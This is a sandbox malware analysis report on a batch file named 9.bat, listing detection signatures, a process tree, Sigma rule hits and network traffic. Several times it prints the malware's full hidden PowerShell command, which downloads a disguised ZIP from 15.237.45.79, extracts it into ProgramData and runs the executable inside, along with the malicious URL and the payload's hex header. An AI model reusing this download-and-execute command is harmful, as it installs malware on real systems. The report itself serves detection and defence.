Loading ...

Play interactive tourEdit tour

Windows Analysis Report 9.bat

Overview

General Information

Sample Name:9.bat
Analysis ID:445201
MD5:7005d5f57a0742e31078f5567e7db5ba
SHA1:e5564917ef975c79f350e9598e5b46dd1a1d5f34
SHA256:304058eed0636beeff43ac336526e5f76b67279d753be0fc0f74f2e2523296da
Infos:

Most interesting Screenshot:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: bitsadmin download and execute
Creates autostart registry keys with suspicious names
Downloads files with wrong headers with respect to MIME Content-Type
Powershell drops PE file
Suspicious powershell command line found
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Bitsadmin Job via PowerShell
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 5696 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\9.bat' ' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6024 cmdline: C:\Windows\system32\cmd.exe /c echo %charpool:~11,1% MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • cmd.exe (PID: 5812 cmdline: C:\Windows\system32\cmd.exe /c echo %charpool:~5,1% MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • cmd.exe (PID: 3756 cmdline: C:\Windows\system32\cmd.exe /c echo %charpool:~2,1% MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • powershell.exe (PID: 400 cmdline: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}' MD5: 95000560239032BC68B4C2FDFCDEF913)
      • CrystalNet-LTD@b52.exe (PID: 7032 cmdline: 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe' MD5: 52253BD91559B9E0E30B0F9E56F41BB6)
        • iexplore.exe (PID: 1844 cmdline: C:\Program Files (x86)\Internet explorer\iexplore.exe MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\CrystalNet-LTD@b52\mpr.dllJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Suspicious Bitsadmin Job via PowerShellShow sources
    Source: Process startedAuthor: Endgame, JHasenbusch (ported to sigma for oscd.community): Data: Command: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}', CommandLine: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}', CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\9.bat' ', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5696, ProcessCommandLine: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\Prog
    Sigma detected: Non Interactive PowerShellShow sources
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}', CommandLine: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}', CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\9.bat' ', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5696, ProcessCommandLine: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\Prog

    Data Obfuscation:

    barindex
    Sigma detected: bitsadmin download and executeShow sources
    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}', CommandLine: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}', CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\9.bat' ', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5696, ProcessCommandLine: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\Prog

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus detection for URL or domainShow sources
    Source: http://15.237.45.79/allwin.pdfAvira URL Cloud: Label: malware
    Multi AV Scanner detection for submitted fileShow sources
    Source: 9.batReversingLabs: Detection: 15%
    Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2h-x32\out32dll\ssleay32.pdb source: powershell.exe, 00000006.00000003.362636058.000002AFFAF20000.00000004.00000001.sdmp
    Source: Binary string: D:\tinderbox\add\out\win.x86\release\obj\VBoxTray\VBoxTray.pdb source: CrystalNet-LTD@b52.exe, 00000016.00000000.388273150.0000000000106000.00000002.00020000.sdmp
    Source: iexplore.exeMemory has grown: Private usage: 9MB later: 138MB

    Networking:

    barindex
    Downloads files with wrong headers with respect to MIME Content-TypeShow sources
    Source: httpBad PDF prefix: HTTP/1.1 200 OK Date: Wed, 07 Jul 2021 09:55:32 GMT Server: Apache/2.4.48 (Ubuntu) Last-Modified: Tue, 06 Jul 2021 12:47:09 GMT ETag: "115d608-5c673d1f591f8" Accept-Ranges: bytes Content-Length: 18208264 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 50 4b 03 04 14 00 00 00 08 00 1a 4d e6 52 52 83 f5 fd c1 14 39 00 6f f7 39 00 08 00 00 00 62 69 6e 2e 7e 74 6d 70 00 27 40 d8 bf 5a 07 c6 4d 61 58 10 5a f1 a9 07 eb b3 bf 3c b0 b6 82 07 60 4d 7e 1e aa f3 65 9b 00 1d ad 73 08 1f 9b 6c 67 f9 d2 94 f2 95 cb 7d ba 82 f7 04 9d 25 a7 95 84 fa 8d 39 be 2b e2 8a 2f b7 fb 23 00 4b c5 39 e9 d9 c6 40 f0 7c 26 ed ac 10 b9 f1 db 3f d6 36 3f 12 79 97 2c 72 2e 07 a7 5a fd 2f 1d af cc 6d bc 94 33 d3 88 d4 79 be f9 68 7f 6f 48 50 5d cb 4d c4 6e a0 4e 3b 93 52 f0 80 0e 26 0c df 92 4f 62 6e b0 9a 30 d2 e3 89 e2 8f 20 ea 96 e2 40 21 ce 53 8c 4f 51 2c 0a ac a1 48 15 78 7d dc b1 38 75 a6 e7 b6 0f b9 6c 5d 1c fe b1 c3 b0 63 a1 cc c8 e0 fe c9 0c ba ca 0f 78 e0 bb 1c 17 85 7b d5 07 f9 76 4a e6 d8 50 15 f4 42 18 24 b0 e5 46 b3 50 75 34 d5 28 26 15 51 9b c0 98 36 c4 25 5c dd f2 1d e7 ef 92 05 94 48 ec e7 fb a8 3d be 8d b6 52 77 a7 7f 17 62 93 be 5a 11 d3 25 3c 3e f2 9b 0d e3 74 df c7 e3 e3 8e 40 dd cd e2 13 60 bb 01 0c c6 93 50 a9 5d 72 93 b0 60 cb b5 e0 bc 03 c6 3a 35 06 68 49 15 53 06 cc 1e 01 e6 66 91 8e fa 63 b5 56 3c 0c 59 93 e2 0e 08 1c bb b5 5b 89 dc 24 46 ed 52 a3 7b 3b 50 ce ab e2 08 d9 74 54 b7 5a ca 66 33 2d 26 b4 ee fe 5a 2a 00 12 89 cf b0 58 ad cf 27 cc 5a 58 32 8b 5c f2 0d 1f 40 1e 4a f0 3c 30 2b d4 6f 0a cb 05 b7 78 8e 66 b4 33 fb 34 25 60 0d 6e e3 f7 8c fb 44 33 e8 41 bd 73 a0 be 8f b5 e8 15 2c 8b 4d 7f 0f f1 68 4c 51 3c 6e 8f b6 76 e4 7e a2 06 4c 97 59 5c 46 47 53 2f 5d b4 a0 56 7e 96 ea 50 a6 1e 65 7e 8c 63 51 96 83 7a a8 2f a6 b4 54 42 12 57 e9 93 ed 0a 8b ef f2 84 e5 0f 33 1f 20 a5 fa 5f a8 30 b9 b5 15 75 ae e1 b9 aa e3 81 56 09 41 18 a4 e6 01 fb 54 27 d6 a3 18 d3 b2 c4 82 33 12 b3 f8 30 0c b2 0f 40 77 3e 51 73 5e cf 7f e2 80 ee b2 6d d0 07 fa 6d 43 57 9c 49 f3 87 6f 6e 0f c9 60 f9 55 72 a1 c2 5d c3 f2 1b a6 e9 a6 bd 5b be fd 51 0c 2d 3a aa 79 02 7f 40 b7 22 75 e1 17 7f 02 e0 31 75 ac 90 61 92 fb 41 12 3d 64 22 23 2a b7 64 0d 2d df 7a de f6 fa 48 d6 47 86 19 79 7f c7 e1 4a 37 8e b4 79 5c 07 7a 27 1f 92 8e d6 61 23 57 8b 97 8a 11 1e cb 35 2b 5d 2a 0c 6b ab 3c a3 6f 14 9d 45 4d 4a bd 84 4e 40 f9 0e 4e 00 32 b5 81 1d 1f 35 31 a2 4f 6f 54 a8 bb 0d 76 cd 8c bf 5c f4 44 32 5e 36 e1 27 d9 5e 70 24 19 df af da cd b6 8a f8 bc 6f a2 6c 17 cc 46 5b ed 31 8c 47 86 72 62 98 07 00 93 b1 5b 9a 17 c3 3a 1d 5d 33 6f a1 4c f9 39 3f af 19 1f 38 9f 60 e7 da 0c e7 2b 6a 66 21 50 71 6e 85 cd 6f 2c cc 43 04 7c 3b 3f 1e 88 68 12 fe 63 57 d1 ab 8a e6 8e d9 97 eb 5c c8 71 7f 11 ac c5 f4 e1 b4 0b 0e 2e 0a 6e b3 41 a6 c4 2c 4f 19 54 dc 46 e8 02 23 53 3e 04 a0 7f fa 86 18 2b d7 5b 01 56 9c e4 27 f0 75 47 b4 4c 0d 7a 73 09 0c b2 bb 05 48 79 a6 66 b3 0f 52 3b be 0e c1 1c 52 15 4d 32 aa 89 5a e2 c3 2e c9 b7 c9 a6 29 c9 b5 61 69 31 42 dc 29 ea
    Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: unknownTCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 07 Jul 2021 09:55:32 GMTServer: Apache/2.4.48 (Ubuntu)Last-Modified: Tue, 06 Jul 2021 12:47:09 GMTETag: "115d608-5c673d1f591f8"Accept-Ranges: bytesContent-Length: 18208264Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/pdfData Raw: 50 4b 03 04 14 00 00 00 08 00 1a 4d e6 52 52 83 f5 fd c1 14 39 00 6f f7 39 00 08 00 00 00 62 69 6e 2e 7e 74 6d 70 00 27 40 d8 bf 5a 07 c6 4d 61 58 10 5a f1 a9 07 eb b3 bf 3c b0 b6 82 07 60 4d 7e 1e aa f3 65 9b 00 1d ad 73 08 1f 9b 6c 67 f9 d2 94 f2 95 cb 7d ba 82 f7 04 9d 25 a7 95 84 fa 8d 39 be 2b e2 8a 2f b7 fb 23 00 4b c5 39 e9 d9 c6 40 f0 7c 26 ed ac 10 b9 f1 db 3f d6 36 3f 12 79 97 2c 72 2e 07 a7 5a fd 2f 1d af cc 6d bc 94 33 d3 88 d4 79 be f9 68 7f 6f 48 50 5d cb 4d c4 6e a0 4e 3b 93 52 f0 80 0e 26 0c df 92 4f 62 6e b0 9a 30 d2 e3 89 e2 8f 20 ea 96 e2 40 21 ce 53 8c 4f 51 2c 0a ac a1 48 15 78 7d dc b1 38 75 a6 e7 b6 0f b9 6c 5d 1c fe b1 c3 b0 63 a1 cc c8 e0 fe c9 0c ba ca 0f 78 e0 bb 1c 17 85 7b d5 07 f9 76 4a e6 d8 50 15 f4 42 18 24 b0 e5 46 b3 50 75 34 d5 28 26 15 51 9b c0 98 36 c4 25 5c dd f2 1d e7 ef 92 05 94 48 ec e7 fb a8 3d be 8d b6 52 77 a7 7f 17 62 93 be 5a 11 d3 25 3c 3e f2 9b 0d e3 74 df c7 e3 e3 8e 40 dd cd e2 13 60 bb 01 0c c6 93 50 a9 5d 72 93 b0 60 cb b5 e0 bc 03 c6 3a 35 06 68 49 15 53 06 cc 1e 01 e6 66 91 8e fa 63 b5 56 3c 0c 59 93 e2 0e 08 1c bb b5 5b 89 dc 24 46 ed 52 a3 7b 3b 50 ce ab e2 08 d9 74 54 b7 5a ca 66 33 2d 26 b4 ee fe 5a 2a 00 12 89 cf b0 58 ad cf 27 cc 5a 58 32 8b 5c f2 0d 1f 40 1e 4a f0 3c 30 2b d4 6f 0a cb 05 b7 78 8e 66 b4 33 fb 34 25 60 0d 6e e3 f7 8c fb 44 33 e8 41 bd 73 a0 be 8f b5 e8 15 2c 8b 4d 7f 0f f1 68 4c 51 3c 6e 8f b6 76 e4 7e a2 06 4c 97 59 5c 46 47 53 2f 5d b4 a0 56 7e 96 ea 50 a6 1e 65 7e 8c 63 51 96 83 7a a8 2f a6 b4 54 42 12 57 e9 93 ed 0a 8b ef f2 84 e5 0f 33 1f 20 a5 fa 5f a8 30 b9 b5 15 75 ae e1 b9 aa e3 81 56 09 41 18 a4 e6 01 fb 54 27 d6 a3 18 d3 b2 c4 82 33 12 b3 f8 30 0c b2 0f 40 77 3e 51 73 5e cf 7f e2 80 ee b2 6d d0 07 fa 6d 43 57 9c 49 f3 87 6f 6e 0f c9 60 f9 55 72 a1 c2 5d c3 f2 1b a6 e9 a6 bd 5b be fd 51 0c 2d 3a aa 79 02 7f 40 b7 22 75 e1 17 7f 02 e0 31 75 ac 90 61 92 fb 41 12 3d 64 22 23 2a b7 64 0d 2d df 7a de f6 fa 48 d6 47 86 19 79 7f c7 e1 4a 37 8e b4 79 5c 07 7a 27 1f 92 8e d6 61 23 57 8b 97 8a 11 1e cb 35 2b 5d 2a 0c 6b ab 3c a3 6f 14 9d 45 4d 4a bd 84 4e 40 f9 0e 4e 00 32 b5 81 1d 1f 35 31 a2 4f 6f 54 a8 bb 0d 76 cd 8c bf 5c f4 44 32 5e 36 e1 27 d9 5e 70 24 19 df af da cd b6 8a f8 bc 6f a2 6c 17 cc 46 5b ed 31 8c 47 86 72 62 98 07 00 93 b1 5b 9a 17 c3 3a 1d 5d 33 6f a1 4c f9 39 3f af 19 1f 38 9f 60 e7 da 0c e7 2b 6a 66 21 50 71 6e 85 cd 6f 2c cc 43 04 7c 3b 3f 1e 88 68 12 fe 63 57 d1 ab 8a e6 8e d9 97 eb 5c c8 71 7f 11 ac c5 f4 e1 b4 0b 0e 2e 0a 6e b3 41 a6 c4 2c 4f 19 54 dc 46 e8 02 23 53 3e 04 a0 7f fa 86 18 2b d7 5b 01 56 9c e4 27 f0 75 47 b4 4c 0d 7a 73 09 0c b2 bb 05 48 79 a6 66 b3 0f 52 3b be 0e c1 1c 52 15 4d 32 aa 89 5a e2 c3 2e c9 b7 c9 a6 29 c9 b5 61 69 31 42
    Source: global trafficHTTP traffic detected: GET /allwin.pdf HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 06 Jul 2021 12:47:09 GMTUser-Agent: Microsoft BITS/7.8Host: 15.237.45.79
    Source: 9.batString found in binary or memory: http://15.237.45.79/%Nqwqo_aRcB_sxUJb____zBI_BgooMMPJI_zStKD_aktFIC_G%ll%N___lIwhr__DzdWC__cVzdLFHBY
    Source: PowerShell_transcript.585948.hyOQbw7f.20210707115524.txt.6.drString found in binary or memory: http://15.237.45.79/allwin.pdf
    Source: powershell.exe, 00000006.00000002.408294219.000002AFFAAD8000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000006.00000003.286143281.000002AFFAF18000.00000004.00000001.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
    Source: powershell.exe, 00000006.00000002.404801764.000002AF90062000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000006.00000003.286143281.000002AFFAF18000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.thawte.com0
